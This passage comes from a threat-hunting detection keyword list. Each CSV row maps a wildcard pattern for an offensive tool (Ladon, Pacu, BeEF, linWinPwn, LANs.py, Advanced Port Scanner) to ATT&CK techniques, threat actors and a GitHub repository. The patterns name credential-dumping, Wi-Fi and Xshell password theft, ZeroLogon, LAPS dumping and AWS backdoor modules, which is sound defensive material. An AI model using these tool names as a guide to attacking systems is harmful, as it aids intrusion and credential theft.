T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon TcpServer *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon UdpServer*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon WebShell*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon whoami*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon WifiPwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon wmiexec*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon WmiExec2 *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon XshellPwd*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ZeroLogon*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon40 BypassUAC*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon911*.ps1,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon911.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon911_*.rar*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*LadonExp.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*LadonGUI.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*LadonLib.rar*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon-N20.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*Ladon-N40.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*LadonStudy.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Lalin.sh *,offensive_tool_keyword,LALIN,this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new,T1588,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/LALIN,1,0,N/A,N/A,4,350,164,2017-04-13T13:47:21Z,2016-06-10T07:53:49Z -*lambda__backdoor_new_sec_groups*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*lan_fingerprint_common.*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*lan_ping_sweep.json*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*lan_sw_port_scan.json*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*lanjelot*,offensive_tool_keyword,Github Username,github username. creator of patator and exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/lanjelot,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LANs.py*,offensive_tool_keyword,LANs.py,Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit,T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003,TA0007 - TA0006 - TA0003 - TA0002 - TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/DanMcInerney/LANs.py,1,1,N/A,N/A,10,2533,518,2021-07-31T21:33:37Z,2013-01-03T19:33:52Z -*lansearch.exe *,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*lansearchpro_portable.zip*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*lansearchpro_setup.exe*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*laps_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 